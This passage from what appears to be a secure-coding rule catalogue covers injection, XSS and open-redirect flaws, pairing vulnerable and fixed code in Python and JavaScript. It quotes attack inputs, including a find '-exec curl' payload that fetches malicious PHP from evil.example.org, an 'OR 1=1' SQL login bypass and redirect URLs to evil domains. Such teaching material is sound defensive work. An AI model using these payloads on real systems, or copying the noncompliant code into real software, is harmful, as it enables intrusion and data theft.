This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) and if XML structures are considered important, as missing critical data can disrupt the regular operations of an organization.

How to fix it in lxml

Code examples

The following noncompliant code is vulnerable to XPath injection because untrusted data is concatenated to an XPath query without prior validation.

Noncompliant code example

from flask import request
from lxml import etree

@app.route('/authenticate')
def authenticate():
    username = request.args['username']
    password = request.args['password']
    expression = "./users/user[@name='" + username + "' and @pass='" + password + "']"
    tree = etree.parse('resources/users.xml')

    if tree.find(expression) is None:
        return "Invalid credentials", 401
    else:
        return "Success", 200

Compliant solution

from flask import request
from lxml import etree

@app.route('/authenticate')
def authenticate():
    username = request.args['username']
    password = request.args['password']
    expression = "./users/user[@name=$username and @pass=$password]"
    tree = etree.parse('resources/users.xml')

    if tree.xpath(expression, username=username, password=password) is None:
        return "Invalid credentials", 401
    else:
        return "Success", 200

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

Parameterized Queries

For XPath injections, the cleanest way to do so is to use parameterized queries.

XPath allows for the usage of variables inside expressions in the form of $variable. XPath variables can be used to construct an XPath query without needing to concatenate user arguments to the query at runtime. Here is an example of an XPath query with variables:

/users/user[@user=$user and @pass=$pass]

When the XPath query is executed, the user input is passed alongside it. During execution, when the values of the variables need to be known, a resolver will return the correct user input for each variable. The contents of the variables are not considered application logic by the XPath executor, and thus injection is not possible.

In the example, the username and password are passed as XPath variables rather than concatenated to the XPath query. By using a parameterized query, injection is successfully prevented.

Resources

Standards

tssecurity:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression search engines use backtracking to try all possible regex execution paths when evaluating an input. Sometimes this can lead to performance problems also referred to as catastrophic backtracking situations.

What is the potential impact?

In the context of a web application vulnerable to regex injection:
After discovering the injection point, attackers insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators. Replication systems would detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Node.js

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service (ReDoS) because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

const express = require('express');

const app = express();

app.get('/lookup', (req, res) => {
  const regex = RegExp(req.query.regex); // Noncompliant

  if(regex.test(req.query.data)){
    res.send("It's a Match!");
  }else{
    res.send("Not a Match!");
  }
})

Compliant solution

const express = require('express');
const escapeStringRegexp = require('escape-string-regexp');

const app = express();

app.get('/lookup', (req, res) => {
  const regex = RegExp(escapeStringRegexp(req.query.regex));

  if(regex.test(req.query.data)){
    res.send("It's a Match!");
  }else{
    res.send("Not a Match!");
  }
})

How does this work?

Sanitization and Validation

Metacharacters escape using native functions is a solution against regex injection.
The escape function sanitizes the input so that the regular expression engine interprets these characters literally.

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.

Important Note: The application must sanitize and validate on the server side. Not on client-side front end.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the compliant solution, the escapeStringRegexp function provided by the npm package escape-string-regexp escapes metacharacters and escape sequences that could have broken the initially intended logic.

Resources

Articles & blog posts

Standards

tssecurity:S5883

Why is this an issue?

OS command argument injections occur when applications allow the execution of operating system commands from untrusted data but the untrusted data is limited to the arguments.
It is not possible to directly inject arbitrary commands that compromise the underlying operating system, but the behavior of the executed command still might be influenced in a way that allows to expand access, for example, execution of arbitrary commands. The security of the application depends on the behavior of the application that is executed.

What is the potential impact?

An attacker exploiting an arguments injection vulnerability will be able to add arbitrary argument to a system binary call. Depending on the command the parameters are added to, this might lead to arbitrary command execution.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Express.js

Code examples

The following code uses the find command and expects the user to enter the name of a file to find on the system.

It is vulnerable to argument injection because untrusted data is inserted in the arguments of a process call without prior validation or sanitization.
Here, the application ignores that a user-submitted parameter might contain special characters that will tamper with the expected system command behavior.

In this particular case, an attacker might add arbitrary arguments to the find command for malicious purposes. For example, the following payload will download malicious software on the application’s hosting server.

 -exec curl -o /var/www/html/ http://evil.example.org/malicious.php ;

Noncompliant code example

async function (req, res) {
    await execa.command('find /tmp/images/' + req.query.id); // Noncompliant
}

Compliant solution

async function (req, res) {
    if (req.query.file && req.query.file.match(/^[A-Z]+$/i)) {
        await execa('find', ['/tmp/images/' + req.query.file]);
    } else {
        await execa('find', ['/tmp/images/']);
    }
}

How does this work?

Allowing users to insert data in operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our suggestion is to avoid using OS commands in the first place.

When this is not possible, strict measures should be applied to ensure a secure implementation.

The proposed compliant solution makes use of the execa method. This one separates the command to run from the arguments passed to it. It also ensures that all arguments passed to the executed command are properly escaped. That way, an attacker with control over a command parameter will not be able to inject arbitrary new ones.

While this reduces the chances for an attacker to identify an exploitation payload, the highest security level will only be reached by adding an additional validation layer.

In the current example, an attacker with control over the first parameter of the find command could still be able to inject special file path characters in it. Indeed, passing ../../ string as a parameter would force the find command to crawl the whole file system. This could lead to a denial of service or sensitive data exposure.

Here, adding a regular-expression-based validation on the user-controled value prevents this kind of issue. It ensures that the user-submitted parameter contains a harmless value.

Resources

Documentation

Standards

tssecurity:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user to browse into a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, to redirect the victim to his evil domain.

Tricking users into sending the malicious HTTP request is usually the main task of exploiting an open redirection. Often, it requires an attacker to build a credible pretext to prevent suspicions from the victim.

Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a link of his choice, the user is redirected to a domain controlled by the attacker.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker’s controlled website mirroring the interface of a web application trusted by the user. Due to the similarity in the application appearance and the apparently trustable clicked hyperlink, the user struggles to identify that they are browsing on a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker’s controlled website that serves malware. On the same basis as the domain mirroring exploitation, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that would result in the download and potential execution of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in Express.js

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

server.get('/redirect', (request, response) => {

   response.redirect(request.query.url); // Noncompliant
});

Compliant solution

server.get('/redirect', (request, response) => {

   if (request.query.url.startsWith("https://www.example.com/")) {
      response.redirect(request.query.url);
   }
});

How does this work?

Built-in framework methods should be preferred as, more often than not, these provide additional security mechanisms. Usually, these built-in methods are engineered for internal page redirections. Thus, they might not be the solution for the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.com.malicious.io. The practice of taking over domains that maliciously look like existing domains is widespread and is called Cybersquatting.

Resources

Standards

tssecurity:S5696

Why is this an issue?

DOM-based cross-site scripting (XSS) occurs in a web application when its client-side logic reads user-controllable data, such as the URL, and then uses this data in dangerous functions defined by the browser, such as eval(), without sanitizing it first.

When well-intentioned users open a link to a page vulnerable to DOM-based XSS, they are exposed to several attacks targeting their browsers.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but also arbitrary code that can be interpreted by the user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting this vulnerability.

Website defacement

An attacker can use the vulnerability to change the target web application’s content as they see fit. Therefore, they might replace the website’s original content with inappropriate content, leading to brand and reputation damage for the web application owner. It could additionally be used in phishing campaigns, leading to the potential loss of user credentials.

User impersonation

When a user is logged into a web application and opens a malicious link, the attacker can steal that user’s web session and carry out unauthorized actions on their account. If the credentials of a privileged user (such as an administrator) are stolen, the attacker might be able to compromise all of the web application’s data.

Theft of sensitive data

Cross-site scripting allows an attacker to extract the application data of any user that opens their malicious link. Depending on the application, this can include sensitive data such as financial or health information. Furthermore, by injecting malicious code into the web application, it might be possible to record keyboard activity (keylogger) or even request access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers can use cross-site scripting vulnerabilities as a first step to exploit more dangerous vulnerabilities.

For example, suppose that the admin control panel of a web application contains an SQL injection vulnerability. In this case, an attacker could find an XSS vulnerability and send a malicious link to an administrator. Once the administrator opens the link, the SQL injection is exploited, giving the attacker access to all user data stored in the web application.

How to fix it in DOM API

Code examples

The following code is vulnerable to DOM-based cross-site scripting because it uses unsanitized URL parameters to alter the DOM of its webpage.

Because the user input is not sanitized here and the used DOM property is vulnerable to XSS, it is possible to inject arbitrary code in the user’s browser through this example.

Noncompliant code example

The Element.innerHTML property is used to replace the contents of the root element with user-supplied contents. The innerHTML property does not sanitize its input, thus allowing for code injection.

const rootEl = document.getElementById('root');
const queryParams = new URLSearchParams(document.location.search);
const input = queryParams.get("input");

rootEl.innerHTML = input; // Noncompliant

Compliant solution

The HTMLElement.innerText property does not create DOM elements out of its input, rather treating its input as a string. This makes it a safe alternative to Element.innerHTML depending on the use case.

const rootEl = document.getElementById('root');
const queryParams = new URLSearchParams(document.location.search);
const input = queryParams.get("input");

rootEl.innerText = input;

How does this work?

In general, one should limit the use of dangerous properties and methods, such as Element.innerHTML or Document.write(), as there exist many ways for an attacker to exploit their usage. Instead, prefer the usage of safe alternatives such as HTMLElement.innerText or Node.textContent. Furthermore, frameworks such as React or Vue.js will automatically escape variables used in views, making it much harder to accidentally write vulnerable code.

If these options are not possible, sanitization of the attacker-controllable input should be preferred.

Sanitization of user-supplied data

By systematically encoding data that is written to the DOM, it is possible to prevent XSS attacks. In this case, the goal is to leave the data intact from the end user’s point of view but make it uninterpretable by web browsers.

However, selecting an encoding that is guaranteed to be safe can be a complex task. XSS exploitation techniques vary depending on the HTML context where malicious input is injected. As a result, a combination of HTML encoding, URL encoding and JavaScript escaping may be required, depending on the context. OWASP’s DOM-based XSS Prevention Cheat Sheet goes into more detail about the required sanitization.

Though browsers do not yet provide any direct API to do this sanitization, the DOMPurify library offers extensive functionality to prevent XSS and has been tested by a large user base.

Pitfalls

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

For example, filtering out user inputs based on a denylist will never fully prevent XSS vulnerabilities from being exploited. This practice is sometimes used by web application firewalls. Time and time again, malicious users are able to find the exploitation payload that will defeat the filters of these firewalls.

Another common approach is to parse HTML and strip sensitive HTML tags. Again, this denylist approach is vulnerable by design: maintaining a list of sensitive HTML tags is very difficult in the long run.

Modification after sanitization

Caution should be taken if the user-supplied data is further modified after this data was sanitized. Doing so might void the effects of sanitization and introduce new XSS vulnerabilities. In general, modification of this data should occur beforehand instead.

Going the extra mile

Content Security Policy

With a defense-in-depth security approach, a Content Security Policy (CSP) can be added through the Content-Security-Policy HTTP header, or using a <meta> element. The CSP aims to mitigate XSS attacks by instructing client browsers not to load data that does not meet the application’s security requirements.

Server administrators can define an allowlist of domains that contain valid scripts, which will prevent malicious scripts (not stored on one of these domains) from being executed. If script execution is not needed on a certain webpage, it can also be blocked altogether.

Resources

Documentation

Articles & blog posts

Standards

tssecurity:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Node.js

Code examples

The following code is vulnerable to command injections because it is using untrusted inputs to set up a new process. Therefore an attacker can execute an arbitrary program that is installed on the system.

Noncompliant code example

const { execSync } = require('child_process')

cmd = req.query.cmd
execSync(cmd) // Noncompliant

Compliant solution

const { spawnSync } = require('child_process')

const cmdId = parseInt(req.query.cmdId)
let host = req.query.host
host = typeof host === "string"? host : "example.org"

const allowedCommands = [
    {exe:"/bin/ping", args:["-c","1","--"]},
    {exe:"/bin/host", args:["--"]}
]
const cmd = allowedCommands[cmdId]
spawnSync(cmd.exe, cmd.args.concat(host))

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, choose simple regexes to avoid ReDOS attacks. For example, you can accept only a specific set of executables, by using ^/bin/(ls|pwd|grep)$.

Important note: The application must do validation on the server side. Not on client-side front-ends.

In the example compliant code, a static list of trusted commands is used. Users are only allowed to submit an index in this array in place of a full command name.

Neutralize special characters

If the application is to execute complex commands that cannot be controlled thanks to pre-approved lists, the cleanest approach is to use special sanitization components, such as child_process.spawn.

The library helps you to get rid of common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • \`
  • \\
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options or argument delimiters are neutralized.
Argument delimiters count ', - and spaces.

For example, the find command from UNIX supports the dangerous argument -exec.
In this case, option processing can be terminated with a string containing -- or with special options. For example, git supports --end-of-options since its version 2.24.

In the example compliant code, the spawn function from child_process is used in place of its less secure exec counterpart. It accepts command arguments as an array and performs a proper escaping of its element before building the command line to run.

Disable shell integration

In most cases, command execution libraries propose two ways to execute external program: with or without shell integration.

When shell integration is allowed, an attacker with control over the command arguments can simply execute additional external programs using system shell features. For example, on Unix, command pipelining (|) or string interpolation ($(), <(), etc.) can be used to break out of a command call.

Therefore, it is generally preferable to disable shell integration.

The spawn function that is used in the example compliant code disables shell integration by default.

Pitfalls

Loose typing

Because JavaScript is a loosely typed language, extra care should be taken when accepting user-controlled parameters. Indeed, some methods, that can be used to sanitize untrusted parameters, sometimes accept both objects and object arrays.

For example, the Array.concat function accepts an array as argument and will append all of its elements to its target. When an untrusted parameter is an array, while a single string was expected, using concat to build a command argument list can result in an arbitrary argument injection.

It is therefore of prime importance to check the type of untrusted parameters before processing them.

In the above compliant code example, the ambiguous concat function is used. However, a type check has been introduced to prevent any unexpected issue.

Resources

Documentation

Standards

tssecurity:S6105

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to build URLs used during redirects.

An attacker with malicious intent could manipulate a user to browse into a specially crafted URL, such as https://trusted.example.com/redirect?url=evil.com, to redirect the victim to their evil domain.

Open redirection is most often used to trick users into browsing to a malicious domain that they believe is safe. As such, attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

An attacker can use this vulnerability to redirect a user from a trusted domain to a malicious domain controlled by the attacker. At that point, the attacker can perform various attacks, such as phishing.

Below are some scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Phishing

Suppose the attacker creates a malicious website that mirrors the interface of the trusted website. In that case, they can use the open redirect vulnerability to lead the user to this malicious site.

Due to the similarity in the application appearance and the supposedly trustable hyperlink, the user fails to identify that they are browsing on a malicious domain. From here, an attacker can capture the user’s credentials, bypass Multi-Factor Authentication (MFA), and take over the user’s account on the trusted website.

Malware distribution

By leveraging the domain mirroring technique explained above, the attacker could also create a website that hosts malware. A user who is unaware of the redirection from a trusted website to this malicious website might then download and execute the attacker’s malware. In the worst case, this can lead to a complete system compromise for the user.

JavaScript injection (XSS)

In certain circumstances, an attacker can use DOM-based open redirection to execute JavaScript code. This can lead to further exploitation in the trusted domain and has consequences such as the compromise of the user’s account.

How to fix it in DOM API

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

The following example is vulnerable to open redirection through the following URL: https://example.com/redirect?url=https://evil.com;

const queryParams = new URLSearchParams(document.location.search);
const redirectUrl = queryParams.get("url");
document.location = redirectUrl; // Noncompliant

Compliant solution

const queryParams = new URLSearchParams(document.location.search);
const redirectUrl = queryParams.get("url");

if (redirectUrl.startsWith("https://www.example.com/")) {
    document.location = redirectUrl;
}

How does this work?

Most client-side frameworks, such as Vue.js or React.js, provide built-in redirection methods. Those should be preferred as they often provide additional security mechanisms. However, these built-in methods are usually engineered for internal page redirections. Thus, they might not solve the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, the following should be done instead:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls.)
  2. Using an allowlist approach in case the destination URLs are multiple but limited.
  3. Adding a dynamic confirmation dialog, warning about the imminent action and requiring manual authorization to proceed to the actual redirection.

Pitfalls

The trap of String.startsWith and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator character (i.e., a /) as the last character.

When this character is not present, attackers may be able to register a specific domain name that both passes validation and is controlled by them.

For example, when validating the https://example.com domain, suppose an attacker owns the https://example.evil domain. If the prefix-based validation is implemented incorrectly, they could create a https://example.com.example.evil subdomain to abuse the broken validation.

The practice of taking over domains that maliciously look like existing domains is widespread and is called cybersquatting.

Resources

Standards

tssecurity:S5147

Why is this an issue?

NoSQL injections occur when an application retrieves untrusted data and inserts it into a database query without sanitizing it first.

What is the potential impact?

In the context of a web application that is vulnerable to NoSQL injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data leakage

In the context of simple query logic breakouts, a malicious database query enables privilege escalation or direct data leakage from one or more databases.
This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) as missing data can disrupt the regular operations of an organization.

Chaining NoSQL injections with other vulnerabilities

Attackers who exploit NoSQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in MongoDB

Code examples

The following code is vulnerable to a NoSQL injection because the database query is built using untrusted JavaScript objects that are extracted from user inputs.

Here the application assumes the user-submitted parameters are always strings, while they might contain more complex structures. An array or dictionary input might tamper with the expected query behavior.

Noncompliant code example

const { MongoClient } = require('mongodb');

function (req, res) {
    let query = { user: req.query.user, city: req.query.city };

    MongoClient.connect(url, (err, db) => {
        db.collection("users")
        .find(query) // Noncompliant
        .toArray((err, docs) => { });
    });
}

Compliant solution

const { MongoClient } = require('mongodb');

function (req, res) {
    let query = { user: req.query.user.toString(), city: req.query.city.toString() };

    MongoClient.connect(url, (err, db) => {
        db.collection("users")
        .find(query)
        .toArray((err, docs) => { });
    });
}

How does this work?

Use only plain string values

With MongoDB, NoSQL injection can arise when attackers are able to inject objects in the query instead of plain string values. For example, using the object { $ne: "" } in a field of a find query, will return every entry where the field is not empty.

Some JavaScript application servers enable "extended" syntax that serializes URL query parameters into JavaScript objects or arrays. This allows attackers to control all the fields of an object. In express.js, this "extended" syntax is enabled by default.

Before using any untrusted value in a MongoDB query, make sure it is a plain string and not a JavaScript object or an array.

In some cases, this will not be enough to protect against all attacks and strict validation needs to be applied (see the "Pitfalls" section)

Pitfalls

Code execution

When untrusted data is used within query operators such as $where, $accumulator, or $function it usually results in JavaScript code execution vulnerabilities.

Therefore, untrusted values should not be used inside these query operators unless they are properly validated.

For more information about MongoDB code execution vulnerabilities, see rule S5334.

Resources

Articles & blog posts

Standards

tssecurity:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Node.js

Code examples

The following code is vulnerable to arbitrary code execution because it dynamically runs JavaScript code built from untrusted data.

Noncompliant code example

function (req, res) {
    let operation = req.query.operation
    eval(`product_${operation}()`) // Noncompliant
    res.send("OK")
}

Compliant solution

const allowed = ["add", "remove", "update"]

let operationId = req.query.operationId
const operation = allowed[operationId]
eval(`product_${operation}()`)
res.send("OK")

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be values used in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to ensure that only the name of the untrusted parameter is passed to the dynamic code and not that its value is expanded into it. After that, the dynamic code will be able to safely access the untrusted parameter content and perform the processing.

Allow list

When the untrusted parameters are expected to contain operators, function names or other reflection-related values, best practices would encourage using an allow list. This one would contain a list of accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.

The example compliant code uses such a binding approach.

Resources

Articles & blog posts

Standards

tssecurity:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

A user with malicious intent carefully performs actions whose goal is to modify the existing query to change its logic to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any pre-requisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Sequelize

Code examples

The following code is an example of an overly simple authentication function. It is vulnerable to SQL injection because user-controlled data is inserted directly into a query string: The application assumes that incoming data always has a specific range of characters, and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

foo' OR 1=1 --

By adapting and inserting this template string into one of the fields (user or pass), an attacker would be able to log in as any user within the scoped user table.

Noncompliant code example

async function index(req, res) {
    const { db, User } = req.app.get('sequelize');

    let loggedInUser = await db.query(
        `SELECT * FROM users WHERE user = '${req.query.user}' AND pass = '${req.query.pass}'`,
        {
            model: User,
        }
    ); // Noncompliant

    res.send(JSON.stringify(loggedInUser));
    res.end();
}}

Compliant solution

async function index(req, res) {
    const { db, User, QueryTypes } = req.app.get('sequelize');

    let user = req.query.user;
    let pass = req.query.pass;

    let loggedInUser = await db.query(
        `SELECT * FROM users WHERE user = $user AND pass = $pass`,
        {
            bind: {
                user: user,
                pass: pass,
            },
            type: QueryTypes.SELECT,
            model: User,
        }
    );

    res.send(JSON.stringify(loggedInUser));
    res.end();
}

How does this work?

Use prepared statements

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of an interpreted context.

For database queries, prepared statements are a natural mechanism to achieve this due to their internal workings.
Here is an example with the following query string (Java SE syntax):

SELECT * FROM users WHERE user = ? AND pass = ?

Note: Placeholders may take different forms, depending on the library used. For the above example, the question mark symbol '?' was used as a placeholder.

When a prepared statement is used by an application, the database server compiles the query logic even before the application passes the literals corresponding to the placeholders to the database.
Some libraries expose a prepareStatement function that explicitly does so, and some do not - because they do it transparently.

The compiled code that contains the query logic also includes the placeholders: they serve as parameters.

After compilation, the query logic is frozen and cannot be changed.
So when the application passes the literals that replace the placeholders, they are not considered application logic by the database.

Consequently, the database server prevents the dynamic literals of a prepared statement from affecting the underlying query, and thus sanitizes them.

On the other hand, the application does not automatically sanitize third-party data (for example, user-controlled data) inserted directly into a query. An attacker who controls this third-party data can cause the database to execute malicious code.

Resources

Articles & blog posts

Standards

tssecurity:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker must use phishing techniques to ensure that his target users click on the link.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the perspective of the user who is the victim. This may result in loss of integrity and theft of the benevolent user’s data.

Identity spoofing

